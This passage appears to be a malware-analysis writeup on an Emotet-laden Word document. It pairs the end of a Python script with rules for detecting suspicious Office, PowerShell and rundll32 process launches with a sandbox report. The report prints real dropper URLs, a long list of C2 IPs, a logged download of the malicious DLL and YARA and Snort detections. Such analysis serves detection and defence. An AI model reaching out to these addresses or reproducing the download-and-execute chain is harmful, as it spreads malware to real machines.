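     "cmd": r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString"},
    {"pid": 2728, "image": RUNDLL32, "parent": RUNDLL32,
     "cmd": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1"},
    {"pid": 2812, "image": RUNDLL32, "parent": RUNDLL32,
     "cmd": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp"},
    {"pid": 2876, "image": RUNDLL32, "parent": RUNDLL32,
     "cmd": r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1"},
]

ENCODED_PS = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
ORDINAL = re.compile(r",\s*#\d+")                      # rundll32 export called by ordinal
RUNDLL_MODULE = re.compile(r"rundll32(?:\.exe)?'?\s+(?:'([^']+)'|([^\s,]+))", re.I)


def _is(ev: dict, key: str, names: tuple) -> bool:
    return ev[key].lower().endswith(names)


def rule_office_spawns_shell(ev: dict) -> bool:
    """Word/Excel/PowerPoint starting a command interpreter or script host."""
    return (_is(ev, "parent", ("winword.exe", "excel.exe", "powerpnt.exe"))
            and _is(ev, "image", ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")))


def rule_encoded_powershell(ev: dict) -> bool:
    """powershell.exe with an -e/-ec/-enc/-EncodedCommand argument followed by base64."""
    return _is(ev, "image", ("powershell.exe",)) and bool(ENCODED_PS.search(ev["cmd"]))


def rule_rundll32_ordinal(ev: dict) -> bool:
    """rundll32.exe told to call an export by ordinal (',#1')."""
    return _is(ev, "image", ("rundll32.exe",)) and bool(ORDINAL.search(ev["cmd"]))


def rule_rundll32_non_dll(ev: dict) -> bool:
    """rundll32.exe loading a module whose file name does not end in .dll."""
    if not _is(ev, "image", ("rundll32.exe",)):
        return False
    m = RUNDLL_MODULE.search(ev["cmd"])
    if not m:
        return False
    module = m.group(1) or m.group(2)
    return not module.lower().endswith(".dll")


RULES = {
    "office_spawns_shell": rule_office_spawns_shell,
    "encoded_powershell": rule_encoded_powershell,
    "rundll32_ordinal": rule_rundll32_ordinal,
    "rundll32_non_dll": rule_rundll32_non_dll,
}


def run(events: list) -> dict:
    """Map each PID to the sorted names of the rules its event matched (PIDs with no hit are omitted)."""
    hits = {}
    for ev in events:
        matched = sorted(name for name, rule in RULES.items() if rule(ev))
        if matched:
            hits[ev["pid"]] = matched
    return hits


if __name__ == "__main__":
    for pid, names in run(EVENTS).items():
        print(pid, ", ".join(names))
```

The first rundll32 invocation (PID 2304, `N49I.dll AnyString`) matches none of the four rules: the export is named rather than an ordinal and the module is a real `.dll`, which is why the ordinal and non-dll rules only start firing from the second stage onwards.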

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ | Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ | Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ | Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ | Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ | Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.rundll32.exe.2e0000.1.raw.unpack | Malware Configuration Extractor: Emotet (the C2 list and RSA public key as given under Malware Configuration above)
Multi AV Scanner detection for domain / URL
Source: http://3musketeersent.net/wp-includes/TUgD/ | Virustotal: Detection: 8%
Source: https://skilmu.com/wp-admin/hQVlB8b/ | Virustotal: Detection: 10%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: ARCH_25_012021.doc | Virustotal: Detection: 57%
Source: ARCH_25_012021.doc | ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 14_2_0074CC2A CryptDecodeObjectEx,

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2098357999.0000000002737000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000005.00000002.2098362682.0000000002740000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: shannared.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49168 -> 84.232.229.24:80
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49169 -> 51.255.203.164:8080
Source: Traffic | Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49171 -> 217.160.169.110:8080
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49173 -> 185.183.16.47:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | IPs: 84.232.229.24:80
Source: Malware configuration extractor | IPs: 51.255.203.164:8080
Source: Malware configuration extractor | IPs: 217.160.169.110:8080
Source: Malware configuration extractor | IPs: 185.183.16.47:80
Source: Malware configuration extractor | IPs: 190.45.24.210:80
Source: Malware configuration extractor | IPs: 187.162.248.237:80
Source: Malware configuration extractor | IPs: 93.146.143.191:80
Source: Malware configuration extractor | IPs: 185.94.252.27:443
Source: Malware configuration extractor | IPs: 143.0.85.206:7080
Source: Malware configuration extractor | IPs: 80.15.100.37:80
Source: Malware configuration extractor | IPs: 85.105.239.184:443
Source: Malware configuration extractor | IPs: 94.176.234.118:443
Source: Malware configuration extractor | IPs: 62.84.75.50:80
Source: Malware configuration extractor | IPs: 137.74.106.111:7080
Source: Malware configuration extractor | IPs: 172.104.169.32:8080
Source: Malware configuration extractor | IPs: 46.105.114.137:8080
Source: Malware configuration extractor | IPs: 94.126.8.1:80
Source: Malware configuration extractor | IPs: 78.206.229.130:80
Source: Malware configuration extractor | IPs: 93.149.120.214:80
Source: Malware configuration extractor | IPs: 192.175.111.212:7080
Source: Malware configuration extractor | IPs: 80.249.176.206:80
Source: Malware configuration extractor | IPs: 181.10.46.92:80
Source: Malware configuration extractor | IPs: 190.24.243.186:80
Source: Malware configuration extractor | IPs: 191.223.36.170:80
Source: Malware configuration extractor | IPs: 177.23.7.151:80
Source: Malware configuration extractor | IPs: 154.127.113.242:80
Source: Malware configuration extractor | IPs: 51.255.165.160:8080
Source: Malware configuration extractor | IPs: 87.106.46.107:8080
Source: Malware configuration extractor | IPs: 85.214.26.7:8080
Source: Malware configuration extractor | IPs: 190.247.139.101:80
Source: Malware configuration extractor | IPs: 46.101.58.37:8080
Source: Malware configuration extractor | IPs: 201.185.69.28:443
Source: Malware configuration extractor | IPs: 46.43.2.95:8080
Source: Malware configuration extractor | IPs: 82.208.146.142:7080
Source: Malware configuration extractor | IPs: 110.39.160.38:443
Source: Malware configuration extractor | IPs: 186.177.174.163:80
Source: Malware configuration extractor | IPs: 51.38.124.206:80
Source: Malware configuration extractor | IPs: 81.4.105.175:8080
Source: Malware configuration extractor | IPs: 209.33.120.130:80
Source: Malware configuration extractor | IPs: 172.245.248.239:8080
Source: Malware configuration extractor | IPs: 45.16.226.117:443
Source: Malware configuration extractor | IPs: 104.130.154.83:7080
Source: Malware configuration extractor | IPs: 217.13.106.14:8080
Source: Malware configuration extractor | IPs: 94.23.45.86:7080
Source: Malware configuration extractor | IPs: 152.169.22.67:80
Source: Malware configuration extractor | IPs: 12.162.84.2:8080
Source: Malware configuration extractor | IPs: 201.48.121.65:443
Source: Malware configuration extractor | IPs: 81.17.93.134:80
Source: Malware configuration extractor | IPs: 81.215.230.173:443
Source: Malware configuration extractor | IPs: 60.93.23.51:80
Source: Malware configuration extractor | IPs: 122.201.23.45:443
Source: Malware configuration extractor | IPs: 31.27.59.105:80
Source: Malware configuration extractor | IPs: 105.209.235.113:8080
Source: Malware configuration extractor | IPs: 197.232.36.108:80
Source: Malware configuration extractor | IPs: 91.233.197.70:80
Source: Malware configuration extractor | IPs: 87.106.253.248:8080
Source: Malware configuration extractor | IPs: 138.97.60.141:7080
Source: Malware configuration extractor | IPs: 152.170.79.100:80
Source: Malware configuration extractor | IPs: 190.251.216.100:80
Source: Malware configuration extractor | IPs: 177.85.167.10:80
Source: Malware configuration extractor | IPs: 212.71.237.140:8080
Source: Malware configuration extractor | IPs: 82.48.39.246:80
Source: Malware configuration extractor | IPs: 213.52.74.198:80
Source: Malware configuration extractor | IPs: 116.125.120.88:443
Source: Malware configuration extractor | IPs: 81.214.253.80:443
Source: Malware configuration extractor | IPs: 149.62.173.247:8080
Source: Malware configuration extractor | IPs: 152.231.89.226:80
Source: Malware configuration extractor | IPs: 206.189.232.2:8080
Source: Malware configuration extractor | IPs: 181.30.61.163:443
Source: Malware configuration extractor | IPs: 1.226.84.243:8080
Source: Malware configuration extractor | IPs: 191.241.233.198:80
Source: Malware configuration extractor | IPs: 109.101.137.162:8080
Source: Malware configuration extractor | IPs: 110.39.162.2:443
Source: Malware configuration extractor | IPs: 167.71.148.58:443
Source: Malware configuration extractor | IPs: 5.196.35.138:7080
Source: Malware configuration extractor | IPs: 190.64.88.186:443
Source: Malware configuration extractor | IPs: 200.75.39.254:80
Source: Malware configuration extractor | IPs: 138.97.60.140:8080
Source: Malware configuration extractor | IPs: 170.81.48.2:80
Source: Malware configuration extractor | IPs: 70.32.115.157:8080
Source: Malware configuration extractor | IPs: 104.131.41.185:8080
Source: Malware configuration extractor | IPs: 190.162.232.138:80
Source: Malware configuration extractor | IPs: 188.135.15.49:80
Source: Malware configuration extractor | IPs: 95.76.153.115:80
Source: Malware configuration extractor | IPs: 188.225.32.231:7080
Source: Malware configuration extractor | IPs: 12.163.208.58:80
Source: Malware configuration extractor | IPs: 50.28.51.143:8080
Source: Malware configuration extractor | IPs: 202.134.4.210:7080
Source: Malware configuration extractor | IPs: 190.210.246.253:80
Source: Malware configuration extractor | IPs: 149.202.72.142:7080
Source: Malware configuration extractor | IPs: 138.197.99.250:8080
Source: Malware configuration extractor | IPs: 68.183.190.199:8080
Source: Malware configuration extractor | IPs: 211.215.18.93:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp | String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Wed, 27 Jan 2021 08:30:36 GMT
Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/
Last-Modified: Wed, 27 Jan 2021 08:30:36 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/octet-stream
X-Cacheable: YES:Forced
Content-Length: 631808
Accept-Ranges: bytes
Date: Wed, 27 Jan 2021 08:30:36 GMT
Age: 0
Vary: User-Agent
X-Cache: uncached
X-Cache-Hit: MISS
X-Backend: all_requests
Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
Source: global traffic | HTTP traffic detected:
GET /content/lhALeS/ HTTP/1.1
Host: shannared.com
Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 192.169.223.13
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: RCS-RDS73-75DrStaicoviciRO
Source: unknown | TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown | TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown | TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown | TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown | TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown | TCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.183.16.47
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /content/lhALeS/ HTTP/1.1Host: shannared.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: shannared.com
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://jeevanlic.com/wp-content/r8M/
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
                      Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2103532538.000000001B8B6000.00000004.00000001.sdmpString found in binary or memory: http://shannared.com/content/lhALeS/
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2098057868.00000000022D0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103421581.0000000002980000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2103145307.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101608511.00000000009C7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102759943.00000000023A7000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2107325517.00000000023B7000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2110722760.0000000000917000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2102931127.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2100205585.00000000007E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2102534747.00000000021C0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000009.00000002.2106073244.00000000021D0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2102755759.0000000003A7A000.00000004.00000001.sdmpString found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 0000000E.00000002.2340258197.0000000000740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2340368896.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2114550082.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2102026803.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2112160359.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2106310017.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2099609589.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2106250328.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2112213482.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2099871520.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2099349373.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
